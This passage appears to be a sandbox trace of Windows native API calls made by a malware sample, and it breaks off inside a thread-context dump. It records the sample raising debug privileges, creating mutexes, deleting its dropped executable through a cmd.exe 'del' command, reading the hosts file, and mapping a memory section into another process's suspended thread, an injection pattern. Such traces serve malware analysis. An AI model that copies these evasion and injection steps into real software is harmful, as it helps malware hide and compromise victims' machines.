ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24f008, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24f020*=0x3c, IoStatusBlock=0x24f008*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0070.593] NtQueryInformationFile (in: FileHandle=0x3c, IoStatusBlock=0x24f008, FileInformation=0x24ef60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24f008, FileInformation=0x24ef60) returned 0x0 [0070.702] NtReadFile (in: FileHandle=0x3c, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x24f008, Buffer=0x4d0020, BufferLength=0x13a928, ByteOffset=0x24ef78*=0, Key=0x0 | out: IoStatusBlock=0x24f008, Buffer=0x4d0020*) returned 0x0 [0070.718] NtClose (Handle=0x3c) returned 0x0 [0070.761] NtQueryInformationFile (in: FileHandle=0x3c, IoStatusBlock=0x24efa8, FileInformation=0x24ed1c, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x24efa8, FileInformation=0x24ed1c) returned 0x0 [0070.761] NtClose (Handle=0x3c) returned 0x0 [0070.996] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0x24f034, Length=0x2, ResultLength=0x0 | out: SystemInformation=0x24f034, ResultLength=0x0) returned 0x0 [0070.999] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x24f058, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x24f058, ReturnLength=0x0) returned 0x0 [0071.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24ece8*=0x0, ZeroBits=0x0, RegionSize=0x24ecec*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24ece8*=0x1c0000, RegionSize=0x24ecec*=0x10000) returned 0x0 [0071.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1c0000, Length=0x10000, ResultLength=0x0 | out: 
SystemInformation=0x1c0000, ResultLength=0x0) returned 0x0 [0071.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24f048*=0x1c0000, RegionSize=0x24f04c, FreeType=0x8000) returned 0x0 [0071.040] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x24ee04 | out: Value="BGC6u8Oy yXGxkR") returned 0x0 [0071.043] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x24f060 | out: TokenHandle=0x24f060*=0x3c) returned 0x0 [0071.045] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x24f054 | out: lpLuid=0x24f054*(LowPart=0x14, HighPart=0)) returned 1 [0071.049] NtAdjustPrivilegesToken (in: TokenHandle=0x3c, DisableAllPrivileges=0, NewState=0x24f050, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x106 [0071.050] NtClose (Handle=0x3c) returned 0x0 [0071.050] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x24eba8 | out: Value="BGC6u8Oy yXGxkR") returned 0x0 [0071.051] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="664908S9", Value=0x24ee40 | out: Value=0x24ee40) returned 0xc0000100 [0071.051] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x24e988 | out: Value="BGC6u8Oy yXGxkR") returned 0x0 [0071.053] NtOpenDirectoryObject (in: FileHandle=0x24ec34, DesiredAccess=0x2000f, ObjectAttributes=0x24ec00*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0x24ec34*=0x3c) returned 0x0 [0071.055] NtCreateMutant (in: MutantHandle=0x24ee60, DesiredAccess=0x1f0001, ObjectAttributes=0x24ebe8*(Length=0x18, RootDirectory=0x3c, ObjectName="664908S9UTEIZ6MN", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0x24ee60*=0x80) returned 0x0 [0071.055] NtClose (Handle=0x3c) returned 0x0 [0071.055] 
RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x24e868 | out: Value="BGC6u8Oy yXGxkR") returned 0x0 [0071.055] NtOpenDirectoryObject (in: FileHandle=0x24ec2c, DesiredAccess=0x2000f, ObjectAttributes=0x24ebf8*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0x24ec2c*=0x3c) returned 0x0 [0071.055] NtCreateMutant (in: MutantHandle=0x24ee58, DesiredAccess=0x1f0001, ObjectAttributes=0x24ebe0*(Length=0x18, RootDirectory=0x3c, ObjectName="OLO0NDS-0AXWwKzG", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0x24ee58*=0x84) returned 0x0 [0071.055] NtClose (Handle=0x3c) returned 0x0 [0071.059] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x24ea70 | out: Value="C:\\Program Files") returned 0x0 [0071.059] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x24ea9c | out: Value="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x0 [0071.065] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Temp\\lambdoidtegument.exe", NtPathName=0x24ea48, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Temp\\lambdoidtegument.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0071.067] NtCreateFile (in: FileHandle=0x24ea68, DesiredAccess=0x120089, ObjectAttributes=0x24ea30*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Temp\\lambdoidtegument.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24ea50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24ea68*=0xffffffff, IoStatusBlock=0x24ea50*(Status=0x0, Pointer=0x0, Information=0x0)) returned 
0xc000003a [0071.067] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", NtPathName=0x24ee18, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0071.067] NtCreateFile (in: FileHandle=0x24ee38, DesiredAccess=0x120089, ObjectAttributes=0x24ee00*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24ee20, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24ee38*=0x3c, IoStatusBlock=0x24ee20*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0071.070] NtQueryInformationFile (in: FileHandle=0x3c, IoStatusBlock=0x24ee20, FileInformation=0x24ed78, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24ee20, FileInformation=0x24ed78) returned 0x0 [0071.076] NtReadFile (in: FileHandle=0x3c, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x24ee20, Buffer=0xc7548, BufferLength=0x3a000, ByteOffset=0x24ed90*=0, Key=0x0 | out: IoStatusBlock=0x24ee20, Buffer=0xc7548*) returned 0x0 [0071.077] NtClose (Handle=0x3c) returned 0x0 [0071.077] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", NtPathName=0x24ee08, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0071.077] NtCreateFile (in: FileHandle=0x24ee28, DesiredAccess=0x120089, ObjectAttributes=0x24edf0*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", Attributes=0x40, SecurityDescriptor=0x0, 
SecurityQualityOfService=0x0), IoStatusBlock=0x24ee10, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24ee28*=0x3c, IoStatusBlock=0x24ee10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0071.078] NtQueryInformationFile (in: FileHandle=0x3c, IoStatusBlock=0x24ee10, FileInformation=0x24ed68, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24ee10, FileInformation=0x24ed68) returned 0x0 [0071.078] NtClose (Handle=0x3c) returned 0x0 [0071.078] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x24e308, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0071.078] NtCreateFile (in: FileHandle=0x24e328, DesiredAccess=0x120089, ObjectAttributes=0x24e2f0*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e310, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e328*=0x3c, IoStatusBlock=0x24e310*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0071.078] NtQueryInformationFile (in: FileHandle=0x3c, IoStatusBlock=0x24e310, FileInformation=0x24e084, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x24e310, FileInformation=0x24e084) returned 0x0 [0071.078] NtClose (Handle=0x3c) returned 0x0 [0071.079] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/c del \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x24e9d8*(cb=0x44, lpReserved=0x0, 
lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24ea1c, hNewToken=0x0 | out: lpProcessInformation=0x24ea1c*(hProcess=0x88, hThread=0x3c, dwProcessId=0xc80, dwThreadId=0xc84), hNewToken=0x0) returned 1 [0071.114] NtWaitForSingleObject (Object=0x88, Alertable=0, Time=0x0) returned 0x0 [0071.625] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x24e6f4 | out: Value="C:\\Program Files") returned 0x0 [0072.974] SetErrorMode (uMode=0x8003) returned 0x1 [0072.976] NtCreateSection (in: SectionHandle=0x24ea80, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x24e7fc, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x24ea80*=0x90) returned 0x0 [0072.979] NtMapViewOfSection (in: SectionHandle=0x90, ProcessHandle=0xffffffff, BaseAddress=0x24ea84*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e7fc*=0x29a00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x24ea84*=0x1c0000, SectionOffset=0x0, ViewSize=0x24e7fc*=0x2a000) returned 0x0 [0072.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e7f4*=0x0, ZeroBits=0x0, RegionSize=0x24e7f8*=0x29a00, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x24e7f4*=0x4d0000, RegionSize=0x24e7f8*=0x2a000) returned 0x0 [0072.983] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="windir", Value=0x24e560 | out: Value="C:\\Windows") returned 0x0 [0072.983] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\System32\\drivers\\etc\\hosts", NtPathName=0x24e528, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0072.983] NtCreateFile (in: 
FileHandle=0x24e548, DesiredAccess=0x120089, ObjectAttributes=0x24e510*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e530, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e548*=0x8c, IoStatusBlock=0x24e530*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0072.983] NtQueryInformationFile (in: FileHandle=0x8c, IoStatusBlock=0x24e530, FileInformation=0x24e488, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24e530, FileInformation=0x24e488) returned 0x0 [0072.983] NtClose (Handle=0x8c) returned 0x0 [0072.983] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\System32\\drivers\\etc\\hosts", NtPathName=0x24e518, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0072.983] NtCreateFile (in: FileHandle=0x24e538, DesiredAccess=0x120089, ObjectAttributes=0x24e500*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e520, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e538*=0x8c, IoStatusBlock=0x24e520*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0072.984] NtQueryInformationFile (in: FileHandle=0x8c, IoStatusBlock=0x24e520, FileInformation=0x24e478, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24e520, FileInformation=0x24e478) returned 0x0 [0072.984] NtReadFile (in: FileHandle=0x8c, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x24e520, Buffer=0x102958, BufferLength=0x338, ByteOffset=0x24e490*=0, Key=0x0 | out: 
IoStatusBlock=0x24e520, Buffer=0x102958*) returned 0x0 [0072.984] NtClose (Handle=0x8c) returned 0x0 [0072.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x1f0000, RegionSize=0x24e818*=0x10000) returned 0x0 [0072.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1f0000, ResultLength=0x0) returned 0x0 [0073.001] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x24debc | out: Value="BGC6u8Oy yXGxkR") returned 0x0 [0073.001] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x24e228 | out: Value="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x0 [0073.001] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x24e240 | out: Value="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x0 [0073.001] NtCreateSection (in: SectionHandle=0x24f870, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x24e278, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x24f870*=0x8c) returned 0x0 [0073.001] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0xffffffff, BaseAddress=0x24f86c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e278*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x24f86c*=0x1b00000, SectionOffset=0x0, ViewSize=0x24e278*=0x9c4000) returned 0x0 [0073.001] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x24d9e0 | out: TokenHandle=0x24d9e0*=0x98) returned 0x0 [0073.004] NtQueryInformationToken (in: TokenHandle=0x98, TokenInformationClass=0x1, TokenInformation=0x24d1d8, TokenInformationLength=0x400, ReturnLength=0x24d9d8 | out: TokenInformation=0x24d1d8, ReturnLength=0x24d9d8) 
returned 0x0 [0073.005] ConvertSidToStringSidW () returned 0x1 [0073.005] NtClose (Handle=0x98) returned 0x0 [0073.012] RtlIntegerToChar (in: Value=0x8ef355b7, Base=0x10, Length=0x20, String=0x1b06481 | out: String="8EF355B7") returned 0x0 [0073.014] NtCreateKey (in: KeyHandle=0x24e4c0, DesiredAccess=0x20219, ObjectAttributes=0x24d9e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e4c0*=0x98) returned 0x0 [0073.017] NtQueryValueKey (in: KeyHandle=0x98, ValueName="ProductName", KeyValueInformationClass=0x1, KeyValueInformation=0x24e02c, Length=0x100, ResultLength=0x24e4a4 | out: KeyValueInformation=0x24e02c*(TitleIndex=0x0, Type=0x1, DataOffset=0x2c, DataLength=0x2e, NameLength=0x16, Name="ProductName", Data="Windows 7 Professional"), ResultLength=0x24e4a4) returned 0x0 [0073.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24da10*=0x0, ZeroBits=0x0, RegionSize=0x24da14*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x24da10*=0x9d0000, RegionSize=0x24da14*=0x1f5000) returned 0x0 [0073.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24d9fc*=0x0, ZeroBits=0x0, RegionSize=0x24da00*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x24d9fc*=0xbd0000, RegionSize=0x24da00*=0x1f5000) returned 0x0 [0073.018] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="TEMP", Value=0x24da00 | out: Value="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp") returned 0x0 [0073.018] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x24d9c8 | out: Value="C:\\Program Files") returned 0x0 [0073.023] NtOpenProcess (in: ProcessHandle=0x24e824, DesiredAccess=0x438, ObjectAttributes=0x24e7ec*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, 
SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x24e804*(UniqueProcess=0x610, UniqueThread=0x0) | out: ProcessHandle=0x24e824*=0x9c) returned 0x0 [0073.023] NtQueryInformationProcess (in: ProcessHandle=0x9c, ProcessInformationClass=0x0, ProcessInformation=0x24e498, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x24e498, ReturnLength=0x0) returned 0x0 [0073.026] NtReadVirtualMemory (in: ProcessHandle=0x9c, BaseAddress=0x7ffde000, Buffer=0x24e7ac, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x24e7ac*, NumberOfBytesRead=0x0) returned 0x0 [0073.028] NtDelayExecution (Alertable=0, Interval=0x24e480*=-50000000) returned 0x0 [0078.539] NtOpenThread (in: ThreadHandle=0x24e818, DesiredAccess=0x1a, ObjectAttributes=0x24e464, ClientId=0x24e47c*(UniqueProcess=0x0, UniqueThread=0x614) | out: ThreadHandle=0x24e818*=0xa0) returned 0x0 [0078.544] NtSuspendThread (in: ThreadHandle=0xa0, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0078.544] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0x9c, BaseAddress=0x24e4b8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e4b4*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x24e4b8*=0x6840000, SectionOffset=0x0, ViewSize=0x24e4b4*=0x9c4000) returned 0x0 [0078.546] NtGetContextThread (in: ThreadHandle=0xa0, Context=0x24e4e0 | out: Context=0x24e4e0*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, 
[26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x266ec70, Ebx=0x0, Edx=0x1af1d8, Ecx=0xdd, Eax=0xe1cd86d3, Ebp=0x1afaac, Eip=0x76f970b4, SegCs=0x1b, EFlags=0x246, Esp=0x1afa90, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, 
[120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, 
